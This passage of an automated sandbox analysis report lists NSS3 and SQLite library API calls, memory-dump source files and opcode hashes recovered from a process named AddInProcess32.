                                                                                        • Part of subcall function 6CCFBDA1: PORT_SetError_Util.NSS3(FFFFE041,?,00000000,00000000), ref: 6CCFBDE0
                                                                                        • Part of subcall function 6CCFBDA1: SECITEM_FreeItem_Util.NSS3(00000000,00000001,?,00000000,00000000), ref: 6CCFBDEE
                                                                                        • Part of subcall function 6CCFBDA1: PORT_SetError_Util.NSS3(FFFFE018,?,00000000,00000000), ref: 6CCFBE06
                                                                                      • PK11_FreeSlot.NSS3(00000000), ref: 6CCFC00D
                                                                                      • PORT_SetError_Util.NSS3(FFFFE018), ref: 6CCFC01B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: K11_Util$Free$Error_$CertItem_Slot$ExistsImportListTokens
                                                                                      • String ID:
                                                                                      • API String ID: 829875677-0
                                                                                      • Opcode ID: 65f9f0746bd41eaa99be62112f176ec1c9b0766a0e95ad849f34785eea7fe9f4
                                                                                      • Instruction ID: 243b7a3126b61ee1b7e55851c024662caa43e92083d923854a03295f268d5eab
                                                                                      • Opcode Fuzzy Hash: 65f9f0746bd41eaa99be62112f176ec1c9b0766a0e95ad849f34785eea7fe9f4
                                                                                      • Instruction Fuzzy Hash: 5EF0A032A0512877DF622B949C00EEE7A5CDF09664F100160FD28A5A10F7228A2797E5
                                                                                      APIs
                                                                                      • PR_GetCurrentThread.NSS3(00000000,?,?,6CCE0905,?,00000000,?,?), ref: 6CD1698D
                                                                                      • PR_Lock.NSS3(?,?,6CCE0905,?,00000000,?,?), ref: 6CD1699A
                                                                                      • PR_WaitCondVar.NSS3(?,000000FF,6CCE0905,?,00000000,?,?), ref: 6CD169B6
                                                                                      • PR_Unlock.NSS3(?), ref: 6CD169CE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: CondCurrentLockThreadUnlockWait
                                                                                      • String ID:
                                                                                      • API String ID: 505954486-0
                                                                                      • Opcode ID: f253b861d3b9bef3d5aab745caea693c2ae233ba481529fefcdcc2f569a050c9
                                                                                      • Instruction ID: 3752b4771edd79778de2faaba09b458535469037342d61ed620ffed22bc02d99
                                                                                      • Opcode Fuzzy Hash: f253b861d3b9bef3d5aab745caea693c2ae233ba481529fefcdcc2f569a050c9
                                                                                      • Instruction Fuzzy Hash: F8F03032108710DFDB221F22E40865AFBF5FB45372B240A1EE99681DA0D732A446DB55
                                                                                      APIs
                                                                                      • PORT_SetError_Util.NSS3(FFFFE001,?,?,6CCE0D83,00000000), ref: 6CCE0F96
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6CCE0D83,00000000), ref: 6CCE0FAB
                                                                                      • SECITEM_FreeItem_Util.NSS3(?,00000001,?,?,6CCE0D83,00000000), ref: 6CCE0FBB
                                                                                      • PORT_Free_Util.NSS3(?,?,?,6CCE0D83,00000000), ref: 6CCE0FC3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Item_$ErrorError_FreeFree_Zfree
                                                                                      • String ID:
                                                                                      • API String ID: 3189617007-0
                                                                                      • Opcode ID: bec6ba94a41607d05dc4d2e24ff01c17464bffa18770d158761670f777291d06
                                                                                      • Instruction ID: f55caac5cbc8d1693ea5cf655d876bac4bfb15f36e8da2986d0ea1756589eb6a
                                                                                      • Opcode Fuzzy Hash: bec6ba94a41607d05dc4d2e24ff01c17464bffa18770d158761670f777291d06
                                                                                      • Instruction Fuzzy Hash: FCE0ED3211D220AEEA211A64B942B9573A4AF02B78F20012AF09851EE0AFA268A095D4
                                                                                      APIs
                                                                                      • PR_GetCurrentThread.NSS3(-00000165,00000000,?,6CD1C559,?,00000000,?,6CD1C167,00000000,?,6CCE3550,?,?,6CCE31FB,00000000,?), ref: 6CD1693F
                                                                                      • PR_Lock.NSS3(00000000,?,6CD1C559,?,00000000,?,6CD1C167,00000000,?,6CCE3550,?,?,6CCE31FB,00000000,?,00000000), ref: 6CD1694C
                                                                                      • PR_WaitCondVar.NSS3(?,000000FF,6CD1C559,?,00000000,?,6CD1C167,00000000,?,6CCE3550,?,?,6CCE31FB,00000000,?,00000000), ref: 6CD16968
                                                                                      • PR_Unlock.NSS3(00000000,00000000,?,6CCE3550,?,?,6CCE31FB,00000000,?,00000000,?,?,00000000,?,6CCDCBFF,?), ref: 6CD1697D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: CondCurrentLockThreadUnlockWait
                                                                                      • String ID:
                                                                                      • API String ID: 505954486-0
                                                                                      • Opcode ID: 7de3e63b1cca3f2e6fb4836c4905c1602586d374c20da3ad82d527326199919a
                                                                                      • Instruction ID: dc5c0ae3b47e25576999325aa437ac9b3fd1d329beebdef343b33386e02a4a3a
                                                                                      • Opcode Fuzzy Hash: 7de3e63b1cca3f2e6fb4836c4905c1602586d374c20da3ad82d527326199919a
                                                                                      • Instruction Fuzzy Hash: DBF05432108710DFEB321F21E908659B7F4FB05775F24072AE59681DA0D731A445DB50
                                                                                      APIs
                                                                                      • PORT_SetError_Util.NSS3(FFFFE005,?,?,6CD2144B,00000000), ref: 6CD22D9C
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • SECOID_FindOIDTag_Util.NSS3(?,?,?,6CD2144B,00000000), ref: 6CD22DA6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$ErrorError_FindTag_
                                                                                      • String ID:
                                                                                      • API String ID: 3592481120-0
                                                                                      • Opcode ID: f934fc92bde557b83148582492631cac602cca2900e3c7bce79298492393d506
                                                                                      • Instruction ID: fd78194abbf54be169fa989fba3229dd91b5f366cd2f56033a3f44ed325eeba6
                                                                                      • Opcode Fuzzy Hash: f934fc92bde557b83148582492631cac602cca2900e3c7bce79298492393d506
                                                                                      • Instruction Fuzzy Hash: 64E0D832A2C6306BC7452779EC48ECA3358CF0127CB244815F344D6F70DA1DE44445E0
                                                                                      APIs
                                                                                      • PR_Lock.NSS3(5B5EC68B,6CCF7562,00000000,?,6CCEFC95,6CCF7562,00000000,?,6CCF7562,00000000,?,00000000,?,00000000,?,6CCF36FF), ref: 6CCEEF6D
                                                                                      • PL_FreeArenaPool.NSS3(6CCF7562,?,6CCEFC95,6CCF7562,00000000,?,6CCF7562,00000000,?,00000000,?,00000000,?,6CCF36FF,00000000,?), ref: 6CCEEF74
                                                                                      • PR_Unlock.NSS3(5B5EC68B,6CCF7562,?,6CCEFC95,6CCF7562,00000000,?,6CCF7562,00000000,?,00000000,?,00000000,?,6CCF36FF,00000000), ref: 6CCEEF81
                                                                                      • PR_DestroyLock.NSS3(5B5EC68B,?,6CCEFC95,6CCF7562,00000000,?,6CCF7562,00000000,?,00000000,?,00000000,?,6CCF36FF,00000000,?), ref: 6CCEEF88
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Lock$ArenaDestroyFreePoolUnlock
                                                                                      • String ID:
                                                                                      • API String ID: 1618887847-0
                                                                                      • Opcode ID: d82386d67d6f9558846d21eddb125fa6cedef310e7ab58f6376edd3779d0b594
                                                                                      • Instruction ID: 4e8166535b2170064a92f703ba0ef1424d23d329de97be9a6d811e64068f84e1
                                                                                      • Opcode Fuzzy Hash: d82386d67d6f9558846d21eddb125fa6cedef310e7ab58f6376edd3779d0b594
                                                                                      • Instruction Fuzzy Hash: 20F0A033101918BBDB026FA6DC0865ABB7CFF47365F044219F20582990DB35A557CBF5
                                                                                      APIs
                                                                                      • PR_Lock.NSS3(05254160,?,?,6CCDDCAF,6CD2C814,00000000,?,?,6CD2CD36,6CD2C814,?,00000000,?,6CD2C814,?,?), ref: 6CCDED65
                                                                                      • PL_HashTableLookup.NSS3(?,?,6CCDDCAF,6CD2C814,00000000,?,?,6CD2CD36,6CD2C814,?,00000000,?,6CD2C814,?,?), ref: 6CCDED74
                                                                                      • SECITEM_DupItem_Util.NSS3(00000000,6CD2C814,?,?), ref: 6CCDED83
                                                                                      • PR_Unlock.NSS3(6CD2C814,?,?), ref: 6CCDED91
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: HashItem_LockLookupTableUnlockUtil
                                                                                      • String ID:
                                                                                      • API String ID: 849293306-0
                                                                                      • Opcode ID: 21aa18573b46821aa52a60e562c4c6b0043d5095d40ed233fc6471d808c7f21b
                                                                                      • Instruction ID: 053bed819f341f65d60e6cc537df4ea3819622b20c58a1feca209138e0e56df3
                                                                                      • Opcode Fuzzy Hash: 21aa18573b46821aa52a60e562c4c6b0043d5095d40ed233fc6471d808c7f21b
                                                                                      • Instruction Fuzzy Hash: A8E0D833702224979F011FB4AC048D5B7FD9B06A6930C0168FB08C2651EB229950D6E4
                                                                                      APIs
                                                                                      • sqlite3_mutex_enter.NSS3(00000000,?,6CCB8B5E,00000000,6CC8C693,?,6CCAC4DC,?,6CD539E4,00000001), ref: 6CC63D60
                                                                                      • PR_Free.NSS3(6CCB8B5E,?,6CCB8B5E,00000000,6CC8C693,?,6CCAC4DC,?,6CD539E4,00000001), ref: 6CC63D79
                                                                                      • sqlite3_mutex_leave.NSS3(?,6CCB8B5E,00000000,6CC8C693,?,6CCAC4DC,?,6CD539E4,00000001), ref: 6CC63D85
                                                                                      • PR_Free.NSS3(6CCB8B5E,00000000,?,6CCB8B5E,00000000,6CC8C693,?,6CCAC4DC,?,6CD539E4,00000001), ref: 6CC63D90
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free$sqlite3_mutex_entersqlite3_mutex_leave
                                                                                      • String ID:
                                                                                      • API String ID: 30058295-0
                                                                                      • Opcode ID: eecf793d2203fadbc50555e6a9f5d46e521fe1c1bec4f1098c3d0a434cfeb869
                                                                                      • Instruction ID: fe42e14506884070139612a601113933371024620660f734f89b4245e9b63dd6
                                                                                      • Opcode Fuzzy Hash: eecf793d2203fadbc50555e6a9f5d46e521fe1c1bec4f1098c3d0a434cfeb869
                                                                                      • Instruction Fuzzy Hash: 71E03932633210ABEF113B56DE495AD3B7CFF03E65B580056EB0492D50EB3114428BD2
                                                                                      APIs
                                                                                      • PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6CCD09AC
                                                                                        • Part of subcall function 6CCD36F3: PR_GetCurrentThread.NSS3(?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD36F6
                                                                                      • PR_DestroyLock.NSS3(?), ref: 6CCD09C8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentDestroyErrorLockThread
                                                                                      • String ID:
                                                                                      • API String ID: 1851458053-0
                                                                                      • Opcode ID: 6648296b395458c82839e033f0b8cabdfeb54a9e6a952fb5094ce4cf5ae99ab8
                                                                                      • Instruction ID: a1021431c854684c46842eab0c0ffdd93740b8bcd8a16ac1bf39dc8d52280069
                                                                                      • Opcode Fuzzy Hash: 6648296b395458c82839e033f0b8cabdfeb54a9e6a952fb5094ce4cf5ae99ab8
                                                                                      • Instruction Fuzzy Hash: 76E0DF31058310AAE6201A2ADC4178777D8AF05278F31062AE62421EE0FFA2B484C644
                                                                                      APIs
                                                                                      • PR_Init.NSS3 ref: 6CCDAF61
                                                                                      • PR_Lock.NSS3 ref: 6CCDAF6D
                                                                                      • PR_Unlock.NSS3(?), ref: 6CCDAF82
                                                                                      • PR_EnterMonitor.NSS3(00000000), ref: 6CCDAF93
                                                                                        • Part of subcall function 6CCDB53A: PR_Lock.NSS3(?,?,?,?,?,6CCCC5AE,0520EDA0,?,6CCD422C,00000000,00000001,00000000,clock,6CCDB207,6CCD36FB), ref: 6CCDB54E
                                                                                        • Part of subcall function 6CCDB53A: PR_WaitCondVar.NSS3(?,000000FF), ref: 6CCDB56E
                                                                                        • Part of subcall function 6CCDB53A: PR_Unlock.NSS3(?), ref: 6CCDB58E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: LockUnlock$CondEnterInitMonitorWait
                                                                                      • String ID:
                                                                                      • API String ID: 3468704757-0
                                                                                      • Opcode ID: d77e2c7e374aa6c9592dcbc3ed912de0bd3aca35516165335fb0b7c35fec47e0
                                                                                      • Instruction ID: d2c5ab0cb623e087f908515271e03abb39d2fe4691e16879770f7f8766a11360
                                                                                      • Opcode Fuzzy Hash: d77e2c7e374aa6c9592dcbc3ed912de0bd3aca35516165335fb0b7c35fec47e0
                                                                                      • Instruction Fuzzy Hash: 1AE02635A256147ACB022B64AC00ACE37786B4277CF0B01A0EB0C51F70FB267954C5E2
                                                                                      APIs
                                                                                      • PK11_FreeSlot.NSS3(8B56EC8B,00000000,?,6CCF1152,E80875FF,E80875FF,E80875FF,C4830000,?,6CCF2A98,56EE7214,?,?,6CCF371A,?,00000000), ref: 6CCF092D
                                                                                      • PR_DestroyLock.NSS3(56EE7214,8B56EC8B,00000000,?,6CCF1152,E80875FF,E80875FF,E80875FF,C4830000,?,6CCF2A98,56EE7214,?,?,6CCF371A,?), ref: 6CCF0935
                                                                                      • PR_DestroyCondVar.NSS3(7501247E,?,6CCF1152,E80875FF,E80875FF,E80875FF,C4830000,?,6CCF2A98,56EE7214,?,?,6CCF371A,?,00000000), ref: 6CCF093E
                                                                                      • PR_DestroyLock.NSS3(83570875,?,6CCF1152,E80875FF,E80875FF,E80875FF,C4830000,?,6CCF2A98,56EE7214,?,?,6CCF371A,?,00000000), ref: 6CCF0947
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Destroy$Lock$CondFreeK11_Slot
                                                                                      • String ID:
                                                                                      • API String ID: 38434575-0
                                                                                      • Opcode ID: 700f51a78f84f4371dc8c1f8268e79c2ceb82c651e397836f5d0392a34c542fa
                                                                                      • Instruction ID: e7e0565dc6466b5a75d29e06814c9336504313925fb90f5607ade889d81aac3e
                                                                                      • Opcode Fuzzy Hash: 700f51a78f84f4371dc8c1f8268e79c2ceb82c651e397836f5d0392a34c542fa
                                                                                      • Instruction Fuzzy Hash: 3DE06D3220050AEFEB421B6BCC04944FBBAFF467253144220E62981920FB32F9229AE0
                                                                                      APIs
                                                                                      • sqlite3_mutex_enter.NSS3(00000000), ref: 6CC68CE7
                                                                                      • sqlite3_free.NSS3(00000000), ref: 6CC68CF2
                                                                                      • sqlite3_mutex_leave.NSS3(00000000,00000000), ref: 6CC68D06
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_freesqlite3_mutex_entersqlite3_mutex_leave
                                                                                      • String ID:
                                                                                      • API String ID: 2240884162-0
                                                                                      • Opcode ID: 01a153504cef81c5562459b41ac3a293ea34a791cfc62502f9c9116a5a051dfe
                                                                                      • Instruction ID: 38db86704b2c841d2032e33e20d2a42f9fd36104bf51c54d5de79ae8c43c1a0f
                                                                                      • Opcode Fuzzy Hash: 01a153504cef81c5562459b41ac3a293ea34a791cfc62502f9c9116a5a051dfe
                                                                                      • Instruction Fuzzy Hash: 8EE0DF32E3B022D7EE122B22DE85F9E33B8EB0332EF050166E600A0D44F730044B8299
                                                                                      APIs
                                                                                      • PR_Lock.NSS3(6CCDEBF4,?,?,?,?,?,6CCEE54B), ref: 6CCDECC7
                                                                                      • PL_HashTableDestroy.NSS3(?,?,?,?,?,6CCEE54B), ref: 6CCDECD3
                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,6CCEE54B), ref: 6CCDECE5
                                                                                      • PR_DestroyLock.NSS3(?,?,?,?,?,6CCEE54B), ref: 6CCDECF1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: DestroyLock$HashTableUnlock
                                                                                      • String ID:
                                                                                      • API String ID: 3980608549-0
                                                                                      • Opcode ID: 2e4eb028f75e1c77110e451fa2af4d44c04a8129379bc090d7397801c000bbf7
                                                                                      • Instruction ID: 696229f10450ceb43118b21a76487b1b9236edfa6c3c4a579388a651c970c2ea
                                                                                      • Opcode Fuzzy Hash: 2e4eb028f75e1c77110e451fa2af4d44c04a8129379bc090d7397801c000bbf7
                                                                                      • Instruction Fuzzy Hash: 63E0BD326223009BFF022FA0C94C7947ABAFB0370BF0C8058E385401A2EB774168EB20
                                                                                      APIs
                                                                                      • PR_Lock.NSS3(6CCDED06,6CCDEBF4,?,?,?,?,?,6CCEE54B), ref: 6CCDED18
                                                                                      • PL_HashTableDestroy.NSS3(?,?,?,?,?,6CCEE54B), ref: 6CCDED24
                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,6CCEE54B), ref: 6CCDED36
                                                                                      • PR_DestroyLock.NSS3(?,?,?,?,?,6CCEE54B), ref: 6CCDED42
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: DestroyLock$HashTableUnlock
                                                                                      • String ID:
                                                                                      • API String ID: 3980608549-0
                                                                                      • Opcode ID: f30068f54d66d1aeabc1134c65bf198b0c009181167a31c414620488ccbd43b1
                                                                                      • Instruction ID: 88ef1f967ad988cc3e464a7642dd2256d11b26c8cbc933ad9ac922a91beba92c
                                                                                      • Opcode Fuzzy Hash: f30068f54d66d1aeabc1134c65bf198b0c009181167a31c414620488ccbd43b1
                                                                                      • Instruction Fuzzy Hash: CAE009726221109BFF026F61CD097147BB9B70331AF488968B3A2401F2DB7A4528EF50
                                                                                      APIs
                                                                                        • Part of subcall function 6CCCD407: FreeSid.ADVAPI32(044ABE50,6CCCFD56,00000000,6CCD3C1D), ref: 6CCCD431
                                                                                      • WSACleanup.WSOCK32(00000000,6CCD3C1D), ref: 6CCCFD5B
                                                                                      • TlsFree.KERNEL32(00000000,6CCD3C1D), ref: 6CCCFD6C
                                                                                      • TlsFree.KERNEL32 ref: 6CCCFD74
                                                                                      • TlsFree.KERNEL32 ref: 6CCCFD7C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free$Cleanup
                                                                                      • String ID:
                                                                                      • API String ID: 3327822341-0
                                                                                      • Opcode ID: 32eb87f80d20312140b703a954a6ffb8a66bdc744d1994f783ba93a5bcc732bd
                                                                                      • Instruction ID: f5f68e1271c303d30436ae8133b46af5bcd41302ac3cb12383b546d94b2642be
                                                                                      • Opcode Fuzzy Hash: 32eb87f80d20312140b703a954a6ffb8a66bdc744d1994f783ba93a5bcc732bd
                                                                                      • Instruction Fuzzy Hash: 8EC00271B1342A6FEE517B61ED05C8D7E79EF031543054052D70852A705B252C56BEE3
                                                                                      APIs
                                                                                      • memset.VCRUNTIME140(6CCBDBF9,00000000,00000030,?,?,?,00000000,00000000,00000000), ref: 6CCBDC9E
                                                                                      Strings
                                                                                      • recovered %d frames from WAL file %s, xrefs: 6CCBDF0D
                                                                                      Memory Dump Source
